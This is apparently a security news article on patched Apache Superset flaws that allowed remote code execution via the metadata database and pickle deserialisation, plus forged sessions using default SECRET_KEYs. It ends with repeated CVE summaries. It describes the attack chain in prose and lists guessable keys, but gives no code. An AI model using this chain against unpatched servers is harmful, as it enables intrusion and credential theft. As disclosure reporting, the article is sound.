Headline
Alert: Apache SuperSet Vulnerabilities Expose Servers to Remote Code Execution Attacks
Patches have been released to address two new security vulnerabilities in Apache SuperSet that could be exploited by an attacker to gain remote code execution on affected systems. The update (version 2.1.1) plugs CVE-2023-39265 and CVE-2023-37941, which make it possible to conduct nefarious actions once a bad actor is able to gain control of Superset’s metadata database. Outside of these
Server Security / Vulnerability
Patches have been released to address two new security vulnerabilities in Apache SuperSet that could be exploited by an attacker to gain remote code execution on affected systems.
The update (version 2.1.1) plugs CVE-2023-39265 and CVE-2023-37941, which make it possible to conduct nefarious actions once a bad actor is able to gain control of Superset’s metadata database.
Outside of these weaknesses, the latest version of Superset also remediates a separate improper REST API permission issue (CVE-2023-36388) that allows for low-privilege users to carry out server-side request forgery (SSRF) attacks.
“Superset by design allows privileged users to connect to arbitrary databases and execute arbitrary SQL queries against those databases using the powerful SQLLab interface,” Horizon3.ai’s Naveen Sunkavally said in a technical write-up.
“If Superset can be tricked into connecting to its own metadata database, an attacker can directly read or write application configuration through SQLLab. This leads to harvesting credentials and remote code execution.”
CVE-2023-39265 relates to a case of URI bypass when connecting to the SQLite database used for the metastore, enabling an attacker to execute data manipulation commands.
Also tracked as part of the same CVE identifier is the lack of validation when importing SQLite database connection information from a file, which could be abused to import a maliciously crafted ZIP archive file.
“Superset versions from 1.5 to 2.1.0 use python’s pickle package to store certain configuration data,” Sunkavally said about CVE-2023-37941.
“An attacker with write access to the metadata database can insert an arbitrary pickle payload into the store, and then trigger deserialization of it, leading to remote code execution.”
Some of the other flaws that have been patched in the latest release are below -
- An MySQL arbitrary file read vulnerability that could be exploited to get credentials to the metadata database
- The abuse of superset load_examples command to get the metadata database URI from the user interface and modify data stored in it
- The use of default credentials to access the metadata database in some installations of Superset
- The leak of database credentials in plaintext when querying the /api/v1/database API as a privileged user (CVE-2023-30776, fixed in 2.1.0)
The disclosure comes a little over four months after the company disclosed a high-severity flaw in the same product (CVE-2023-27524, CVSS score: 8.9) that could enable unauthorized attackers to gain admin access to the servers and execute arbitrary code.
UPCOMING WEBINAR
Way Too Vulnerable: Uncovering the State of the Identity Attack Surface
Achieved MFA? PAM? Service account protection? Find out how well-equipped your organization truly is against identity threats
Supercharge Your Skills
The problem arises as a result of using a default SECRET_KEY that could be abused by attackers to authenticate and access unauthorized resources on internet-exposed installations.
Since the public disclosure of the flaw in April 2023, Horizon3.ai said 2076 out of 3842 Superset servers are still using a default SECRET_KEY, with about 72 instances using a trivially guessable SECRET_KEY like superset, SUPERSET_SECRET_KEY, 1234567890, admin, changeme, thisisasecretkey, and your_secret_key_here.
“The user is responsible for setting the Flask SECRET_KEY, which invariably leads to some users setting weak keys,” Sunkavally said, urging the maintainers to add support for automatically generating the key.
“At the root of many of the vulnerabilities […] is the fact that the Superset web interface permits users to connect to the metadata database. At the root of many of the vulnerabilities in this post is the fact that the Superset web interface permits users to connect to the metadata database.”
Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.
Related news
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added six security flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. This includes CVE-2023-27524 (CVSS score: 8.9), a high-severity vulnerability impacting the Apache Superset open-source data visualization software that could enable remote code execution.
Apache Superset versions 2.0.0 and below utilize Flask with a known default secret key which is used to sign HTTP cookies. These cookies can therefore be forged. If a user is able to login to the site, they can decode the cookie, set their user_id to that of an administrator, and re-sign the cookie. This valid cookie can then be used to login as the targeted user. From there the Superset database is mounted, and credentials are pulled. A dashboard is then created. Lastly a pickled python payload can be set for that dashboard within Superset's database which will trigger the remote code execution. An attempt to clean up ALL of the dashboard key values and reset them to their previous values happens during the cleanup phase.
If an attacker gains write access to the Apache Superset metadata database, they could persist a specifically crafted Python object that may lead to remote code execution on Superset's web backend. This vulnerability impacts Apache Superset versions 1.5.0 up to and including 2.1.0.
Apache Superset would allow for SQLite database connections to be incorrectly registered when an attacker uses alternative driver names like sqlite+pysqlite or by using database imports. This could allow for unexpected file creation on Superset webservers. Additionally, if Apache Superset is using a SQLite database for its metadata (not advised for production use) it could result in more severe vulnerabilities related to confidentiality and integrity. This vulnerability exists in Apache Superset versions up to and including 2.1.0.
Improper REST API permission in Apache Superset up to and including 2.1.0 allows for an authenticated Gamma users to test network connections, possible SSRF.
Apache Superset would allow for SQLite database connections to be incorrectly registered when an attacker uses alternative driver names like sqlite+pysqlite or by using database imports. This could allow for unexpected file creation on Superset webservers. Additionally, if Apache Superset is using a SQLite database for its metadata (not advised for production use) it could result in more severe vulnerabilities related to confidentiality and integrity. This vulnerability exists in Apache Superset versions up to and including 2.1.0.
If an attacker gains write access to the Apache Superset metadata database, they could persist a specifically crafted Python object that may lead to remote code execution on Superset's web backend. This vulnerability impacts Apache Superset versions 1.5.0 up to and including 2.1.0.
An authenticated user with specific data permissions could access database connections stored passwords by requesting a specific REST API. This issue affects Apache Superset version 1.3.0 up to 2.0.1.
The maintainers of the Apache Superset open source data visualization software have released fixes to plug an insecure default configuration that could lead to remote code execution. The vulnerability, tracked as CVE-2023-27524 (CVSS score: 8.9), impacts versions up to and including 2.0.1 and relates to the use of a default SECRET_KEY that could be abused by attackers to authenticate and access
Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config.
Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config.
An authenticated user with specific data permissions could access database connections stored passwords by requesting a specific REST API. This issue affects Apache Superset version 1.3.0 up to 2.0.1.